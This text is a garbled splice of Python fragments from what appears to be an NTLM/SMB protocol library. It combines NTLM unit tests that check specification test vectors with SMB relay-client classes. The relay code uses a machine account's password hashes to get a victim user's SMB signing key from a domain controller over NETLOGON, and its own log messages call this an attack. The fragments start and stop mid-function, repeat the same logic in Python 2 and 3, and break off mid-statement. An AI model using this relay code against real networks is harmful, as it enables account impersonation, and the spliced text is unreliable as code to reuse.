serverChallenge = resp['ServerChallenge']
if self.serverConfig.machineHashes == '':
ntHash = None
else:
ntHash = bytes.fromhex(
self.serverConfig.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', b'12345678',
serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential(b'12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(
dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel,
serverName + '\x00', ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request[
'ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request[
'LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation'][
'tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'UserName'] = authenticateMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallenge'] = self.serverChallenge
request['LogonInformation']['LogonNetworkTransitive'][
'NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = b'\x00' * 8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
# request.dump()
try:
resp = dce.request(request)
# resp.dump()
except DCERPCException as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
return e.get_error_code()
logging.info(
"%s\\%s successfully validated through NETLOGON" %
(domainName, authenticateMessage['user_name'].decode('utf-16le')))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != b'':
signingKey = generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']
['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4'][
'UserSessionKey']
logging.info("SMB Signing key: %s " % signingKey.hex())
return STATUS_SUCCESS, signingKey
def test_ntlmv1(self):
print("####### 4.2.2 NTLMv1 Authentication")
ntlm.USE_NTLMv2 = False
print("4.2.2.1 LMOWFv1()")
res = ntlm.LMOWFv1(self.password)
print(repr(res))
hexdump(res)
self.assertTrue(res==bytearray(b'\xe5,\xacgA\x9a\x9a"J;\x10\x8f?\xa6\xcbm'))
print("\n")
print("4.2.2.1.2 NTOWFv1()")
res = ntlm.NTOWFv1(self.password)
hexdump(res)
self.assertTrue(res==bytearray(b'\xa4\xf4\x9c\x40\x65\x10\xbd\xca\xb6\x82\x4e\xe7\xc3\x0f\xd8\x52'))
print("\n")
print("4.2.2.1.3 Session Base Key and Key Exchange Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(int(self.flags), self.serverChallenge,
self.clientChallenge, self.serverName,
self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey==bytearray(b'\xD8\x72\x62\xB0\xCD\xE4\xB1\xCB\x74\x99\xBE\xCC\xCD\xF1\x07\x84'))
print("\n")
print("4.2.2.2.1 NTLMv1 Response")
hexdump(ntResponse)
self.assertTrue(ntResponse==bytearray(b'\x67\xC4\x30\x11\xF3\x02\x98\xA2\xAD\x35\xEC\xE6\x4F\x16\x33\x1C\x44\xBD\xBE\xD9\x27\x84\x1F\x94'))
print("\n")
print("4.2.2.2.2 LMv1 Response")
hexdump(lmResponse)
self.assertTrue(lmResponse==bytearray(b'\x98\xDE\xF7\xB8\x7F\x88\xAA\x5D\xAF\xE2\xDF\x77\x96\x88\xA1\x72\xde\xf1\x1c\x7d\x5c\xcd\xef\x13'))
print("\n")
print("4.2.2.2.2 LMv1 Response with NTLMSSP_NEGOTIATE_LM_KEY set")
flags2 = self.flags
#flags2 = flags | ntlm.NTLMSSP_LM_KEY
#hexdump(struct.pack('<L',flags2))
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(int(flags2), self.serverChallenge,
self.clientChallenge, self.serverName, self.domain, self.user,
self.password, '', '')
hexdump(lmResponse)
print("\n")
print("4.2.2.2.3 Encrypted Session Key ")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(int(self.flags), self.serverChallenge,
self.clientChallenge, self.serverName, self.domain, self.user, self.password, '', '')
keyExchangeKey = ntlm.KXKEY(self.flags, sessionBaseKey, lmResponse, self.serverChallenge, self.password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,self.randomSessionKey)
hexdump(encryptedSessionKey)
self.assertTrue(encryptedSessionKey==bytearray(b'\x51\x88\x22\xB1\xB3\xF3\x50\xC8\x95\x86\x82\xEC\xBB\x3E\x3C\xB7'))
print("\n")
print("4.2.2.2.3 Encrypted Session Key (NTLMSSP_NON_NT_KEY)")
flags2 = self.flags | ntlm.NTLMSSP_REQUEST_NON_NT_SESSION_KEY
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse, self.serverChallenge, self.password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,self.randomSessionKey)
hexdump(encryptedSessionKey)
#ToDo Fix this
#self.assertTrue(encryptedSessionKey==bytearray(b'\x74\x52\xca\x55\xc2\x25\xa1\xca\x04\xb4\x8f\xae\x32\xcf\x56\xfc'))
print("\n")
print("4.2.2.2.3 Encrypted Session Key (NTLMSSP_LM_KEY)")
flags2 = self.flags | ntlm.NTLMSSP_NEGOTIATE_LM_KEY
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse, self.serverChallenge, self.password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,self.randomSessionKey)
hexdump(encryptedSessionKey)
#ToDo Fix this
#self.assertTrue(encryptedSessionKey==bytearray(b'\x4c\xd7\xbb\x57\xd6\x97\xef\x9b\x54\x9f\x02\xb8\xf9\xb3\x78\x64')
print("\n")
print("4.2.2.3 AUTHENTICATE MESSAGE")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(int(self.flags), self.serverChallenge,
self.clientChallenge, self.serverName, self.domain, self.user, self.password, '', '')
keyExchangeKey = ntlm.KXKEY(self.flags, sessionBaseKey, lmResponse, self.serverChallenge, self.password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags2
ntlmChallengeResponse['host_name'] = self.workstationName.encode('utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
ntlmChallengeResponse['session_key'] = encryptedSessionKey
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData()==bytearray(b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00\x18\x00\x18\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x10\x00\x10\x00\xac\x00\x00\x00\xb3\x82\x02\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\x98\xde\xf7\xb8\x7f\x88\xaa]\xaf\xe2\xdfw\x96\x88\xa1r\xde\xf1\x1c}\\\xcd\xef\x13g\xc40\x11\xf3\x02\x98\xa2\xad5\xec\xe6O\x163\x1cD\xbd\xbe\xd9\'\x84\x1f\x94Q\x88"\xb1\xb3\xf3P\xc8\x95\x86\x82\xec\xbb><\xb7'))
print("\n")
print("4.2.2.4 GSS_WrapEx")
print("Output of SEAL()")
from Crypto.Cipher import ARC4
cipher = ARC4.new(self.randomSessionKey)
handle = cipher.encrypt
print("Plaintext")
hexdump(self.plaintext)
print("\n")
sealedMsg, signature = ntlm.SEAL(self.flags, self.nonce, self.nonce, self.plaintext, self.plaintext, self.seqNum, handle)
#signature = ntlm.SIGN(flags, nonce, plaintext, seqNum, handle)
hexdump(sealedMsg)
self.assertTrue(sealedMsg==bytearray(b'V\xfe\x04\xd8a\xf91\x9a\xf0\xd7#\x8a.;ME\x7f\xb8'))
print("\n")
hexdump(signature.getData())
self.assertTrue(signature.getData()==bytearray(b'\x01\x00\x00\x00\x00\x00\x00\x00\t\xdc\xd1\xdf.E\x9d6'))
print("\n")
print("####### 4.2.3 NTLMv1 with Client Challenge")
flags = ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY \
| ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM |\
ntlm.NTLMSSP_NEGOTIATE_SEAL | ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
print("Flags")
hexdump(struct.pack('<L',flags))
print("\n")
print("4.2.3.1.1 NTOWFv1(password)")
hexdump(ntlm.NTOWFv1(self.password))
print("\n")
print("4.2.3.1.2 Session Base Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(int(flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey==bytearray(b'\xd8rb\xb0\xcd\xe4\xb1\xcbt\x99\xbe\xcc\xcd\xf1\x07\x84'))
print("\n")
print("4.2.3.1.3 Key Exchange Key")
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse, self.serverChallenge, self.password,'','')
hexdump(keyExchangeKey)
# ToDo: Fix this
#self.assertTrue(keyExchangeKey==bytearray(b'\xeb\x93\x42\x9a\x8b\xd9\x52\xf8\xb8\x9c\x55\xb8\x7f\x47\x5e\xdc'))
print("\n")
print("4.2.3.2.1 LMv1 Response")
hexdump(lmResponse)
#self.assertTrue(lmResponse==bytearray(b'\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
print("\n")
print("4.2.3.2.2 NTLMv1 Response")
hexdump(ntResponse)
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\x75\x37\xf8\x03\xae\x36\x71\x28\xca\x45\x82\x04\xbd\xe7\xca\xf8\x1e\x97\xed\x26\x83\x26\x72\x32'))
print("\n")
print("AUTHENTICATE MESSAGE")
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags2
ntlmChallengeResponse['host_name'] = self.workstationName.encode('utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData()==bytearray(b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00\x18\x00\x18\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\xb3\x82\x02\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u7\xf8\x03\xae6q(\xcaE\x82\x04\xbd\xe7\xca\xf8\x1e\x97\xed&\x83&r2'))
print("\n")
print("4.2.3.4 GSS_WrapEx")
print("Plaintext")
hexdump(self.plaintext)
print("\n")
print("Output of SEAL()")
exportedSessionKey = keyExchangeKey
clientSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey)
serverSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey, "Server")
clientSealingKey = ntlm.SEALKEY(flags, exportedSessionKey)
serverSealingKey = ntlm.SEALKEY(flags, exportedSessionKey, "Server")
from Crypto.Cipher import ARC4
cipher = ARC4.new(clientSigningKey)
client_signing_h = cipher.encrypt
cipher2 = ARC4.new(clientSealingKey)
client_sealing_h = cipher2.encrypt
print("SEALKEY()")
hexdump(clientSealingKey)
print("\n")
print("SIGNKEY()")
hexdump(clientSigningKey)
print("\n")
print("Sealed Data")
sealedMsg, signature = ntlm.SEAL(flags, clientSealingKey, clientSigningKey,
self.plaintext, self.plaintext, self.seqNum, client_sealing_h)
#signature = ntlm.SIGN(flags, clientSigningKey, plaintext, seqNum, client_sealing_h)
hexdump(sealedMsg)
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\xa0\x23\x72\xf6\x53\x02\x73\xf3\xaa\x1e\xb9\x01\x90\xce\x52\x00\xc9\x9d'))
print("\n")
print("Signature")
hexdump(signature.getData())
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\x01\x00\x00\x00\xff\x2a\xeb\x52\xf6\x81\x79\x3a\x00\x00\x00\x00')
print("\n")
def test_ntlmv2(self):
print("####### 4.2.4 NTLMv2 Authentication")
ntlm.USE_NTLMv2 = True
serverName = '\x02\x00\x0c\x00\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00\x01\x00\x0c\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x00\x00\x00\x00'
# Still the aTime won't be set to zero. that must be changed in ntlm.computeResponseNTLM2. Gotta make this more automated
flags = ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH | ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_128 | \
ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | \
ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | ntlm.NTLMSSP_TARGET_TYPE_SERVER | \
ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM | ntlm.NTLMSSP_NEGOTIATE_SEAL | \
ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
print("Flags")
hexdump(struct.pack('<L',flags))
print("\n")
print("4.2.4.1.1 NTOWFv2 and LMOWFv2")
res = ntlm.NTOWFv2(self.user,self.password,self.domain)
hexdump(res)
self.assertTrue(res==bytearray(b'\x0c\x86\x8a@;\xfdz\x93\xa3\x00\x1e\xf2.\xf0.?'))
print("\n")
print("\n")
print("4.2.4.1.2 Session Base Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv2(flags, self.serverChallenge,
self.clientChallenge, serverName, self.domain, self.user, self.password, '', '' )
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey==bytearray(b'\x8d\xe4\x0c\xca\xdb\xc1\x4a\x82\xf1\x5c\xb0\xad\x0d\xe9\x5c\xa3'))
print("\n")
print("4.2.4.2.1 LMv2 Response")
hexdump(lmResponse)
self.assertTrue(lmResponse==bytearray(b'\x86\xc3P\x97\xac\x9c\xec\x10%TvJW\xcc\xcc\x19\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa'))
print("\n")
print("4.2.4.2.2 NTLMv2 Response")
hexdump(ntResponse[:16])
self.assertTrue(ntResponse[:16]==bytearray(b'\x68\xcd\x0a\xb8\x51\xe5\x1c\x96\xaa\xbc\x92\x7b\xeb\xef\x6a\x1c'))
print("\n")
print("4.2.4.2.3 Encrypted Session Key")
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse, self.serverChallenge, self.password,'','')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,self.randomSessionKey)
hexdump(encryptedSessionKey)
self.assertTrue(encryptedSessionKey==bytearray(b'\xC5\xDA\xD2\x54\x4F\xC9\x79\x90\x94\xCE\x1C\xE9\x0B\xC9\xD0\x3E'))
print("\n")
print("AUTHENTICATE MESSAGE")
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags
ntlmChallengeResponse['host_name'] = self.workstationName.encode('utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
ntlmChallengeResponse['session_key'] = encryptedSessionKey
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData()==bytearray(b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00T\x00T\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x10\x00\x10\x00\xe8\x00\x00\x003\x82\x8a\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\x86\xc3P\x97\xac\x9c\xec\x10%TvJW\xcc\xcc\x19\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaah\xcd\n\xb8Q\xe5\x1c\x96\xaa\xbc\x92{\xeb\xefj\x1c\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x02\x00\x0c\x00D\x00o\x00m\x00a\x00i\x00n\x00\x01\x00\x0c\x00S\x00e\x00r\x00v\x00e\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\xda\xd2TO\xc9y\x90\x94\xce\x1c\xe9\x0b\xc9\xd0>'))
print("\n")
print("4.2.4.4 GSS_WrapEx")
print("Plaintext")
hexdump(self.plaintext)
print("\n")
print("Output of SEAL()")
exportedSessionKey = self.randomSessionKey
clientSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey)
serverSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey, "Server")
clientSealingKey = ntlm.SEALKEY(flags, exportedSessionKey)
serverSealingKey = ntlm.SEALKEY(flags, exportedSessionKey, "Server")
from Crypto.Cipher import ARC4
cipher = ARC4.new(clientSigningKey)
client_signing_h = cipher.encrypt
cipher2 = ARC4.new(clientSealingKey)
client_sealing_h = cipher2.encrypt
print("SEALKEY()")
hexdump(clientSealingKey)
self.assertTrue(clientSealingKey==bytearray(b'Y\xf6\x00\x97<\xc4\x96\n%H\n|\x19nLX'))
print("\n")
print("SIGNKEY()")
hexdump(clientSigningKey)
self.assertTrue(clientSigningKey==bytearray(b'G\x88\xdc\x86\x1bG\x82\xf3]C\xfd\x98\xfe\x1a-9'))
print("\n")
print("Sealed Data")
sealedMsg, signature = ntlm.SEAL(flags, clientSealingKey, clientSigningKey,
self.plaintext, self.plaintext, self.seqNum, client_sealing_h)
#signature = ntlm.SIGN(flags, clientSigningKey, plaintext, seqNum, client_sealing_h)
hexdump(sealedMsg)
self.assertTrue(sealedMsg==bytearray(b'T\xe5\x01e\xbf\x196\xdc\x99` \xc1\x81\x1b\x0f\x06\xfb_'))
print("\n")
print("Signature")
hexdump(signature.getData())
self.assertTrue(signature.getData()==bytearray(b'\x01\x00\x00\x00\x00\xc1a\xa1\x1e@\x03\x9f\x00\x00\x00\x00'))
#print (repr(bytearray(str(signature))))
#raise
print("\n")
print "4.2.2.2.2 LMv1 Response with NTLMSSP_NEGOTIATE_LM_KEY set"
flags2 = flags
#flags2 = flags | ntlm.NTLMSSP_LM_KEY
#hexdump(struct.pack('<L',flags2))
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
long(flags2), serverChallenge, clientChallenge, serverName, domain, user,
password, '', '')
hexdump(lmResponse)
print "\n"
print "4.2.2.2.3 Encrypted Session Key "
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
long(flags), serverChallenge, clientChallenge, serverName, domain, user,
password, '', '')
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse, serverChallenge,
password, '', '')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,
randomSessionKey)
hexdump(encryptedSessionKey)
print "\n"
print "4.2.2.2.3 Encrypted Session Key (NTLMSSP_NON_NT_KEY)"
flags2 = flags | ntlm.NTLMSSP_NOT_NT_KEY
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse,
serverChallenge, password, '', '')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,
randomSessionKey)
hexdump(encryptedSessionKey)
print "\n"
print "4.2.2.2.3 Encrypted Session Key (NTLMSSP_LM_KEY)"
flags2 = flags | ntlm.NTLMSSP_LM_KEY
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse,
class SMBClient(smb.SMB):
def __init__(self, remote_name, extended_security=True, sess_port=445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
smb.SMB.__init__(self, remote_name, remote_name, sess_port=sess_port)
def neg_session(self):
neg_sess = smb.SMB.neg_session(
self, extended_security=self._extendedSecurity)
return neg_sess
def setUid(self, uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters[
'SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = str(user)
sessionSetup['Data']['PrimaryDomain'] = str(domain)
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
print "[!] Error login_standard"
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount(self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
print "[!] Signature is REQUIRED on the other end, attack will not work"
else:
print "[*] Signature is REQUIRED on the other end, using NETLOGON approach"
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
print "[*] Connecting to %s NETLOGON service" % self.domainIp
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'])
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = ntlm.AV_PAIRS(av_pairs)
serverName = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode(
'utf-16le')
except:
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount, '', domainName,
lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName + '\x00',
'12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = self.machineHashes.split(':')[1].decode('hex')
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678',
serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
resp = nrpc.hNetrServerAuthenticate3(
dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel,
serverName + '\x00', ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request[
'ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request[
'LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation'][
'tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'UserName'] = authenticateMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive'][
'NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00' * 8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except Exception, e:
#import traceback
#print traceback.print_exc()
print "[!] %s " % e
return e.get_error_code()
print "[*] %s\\%s successfully validated through NETLOGON" % (
domainName, authenticateMessage['user_name'].decode('utf-16le'))
encryptedSessionKey = authenticateMessage['session_key']
if encryptedSessionKey != '':
signingKey = ntlm.generateEncryptedSessionKey(
resp['ValidationInformation']['ValidationSam4']
['UserSessionKey'], encryptedSessionKey)
else:
signingKey = resp['ValidationInformation']['ValidationSam4'][
'UserSessionKey']
print "[*] SMB Signing key: %s " % signingKey.encode('hex')
self.set_session_key(signingKey)
self._SignatureEnabled = True
self._SignSequenceNumber = 2
self.set_flags(flags1=SMB.FLAGS1_PATHCASELESS,
flags2=SMB.FLAGS2_EXTENDED_SECURITY)
return STATUS_SUCCESS
class SMBRelayClient(smb.SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
smb.SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = smb.SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
